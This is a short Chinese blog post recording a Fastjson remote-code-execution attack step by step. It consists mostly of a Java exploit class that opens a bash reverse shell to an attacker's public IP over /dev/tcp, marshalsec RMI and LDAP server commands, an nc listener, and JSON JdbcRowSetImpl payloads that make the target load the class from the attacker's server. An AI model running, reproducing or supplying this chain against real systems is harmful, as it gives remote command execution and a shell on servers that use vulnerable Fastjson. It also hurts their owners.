Fastjson RCE 反弹 shell

注：本文仅用于记录操作步骤

准备一台公网服务器

python -m SimpleHTTPServer 8888

javac Exp.java

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;
 
 
public class Exploit{
    public Exploit() {}
 
    static
    {
        try {
            String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                    ? new String[]{"cmd.exe","/c", "calc.exe"}
                    : new String[]{"bash", "-c", "/bin/bash -i >&amp; /dev/tcp/【公网IP】/7778 0>&amp;1"};
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
 
    public static void main(String[] args) {
        Exploit e = new Exploit();
        System.out.println("hello world");
    }
}

上传编译后的Exp.class以及jar包至服务器

Exp.class
marshalsec-0.0.3-SNAPSHOT-all.jar

# 有2个协议
RMI
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://公网IP/#Exp 7776


LDAP
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://公网IP/#Exp 7776

nc反弹shell

nc -lvp 7778

http请求

# ldap
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://【公网IP】:7776/Exploit","autoCommit":true}}

# rmi
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://【公网IP】:7776/Exploit","autoCommit":true}}

posted @ 2022-05-04 20:58 YySF_01 阅读(113) 评论(0) 收藏举报

刷新页面返回顶部

Fastjson RCE 反弹 shell

公告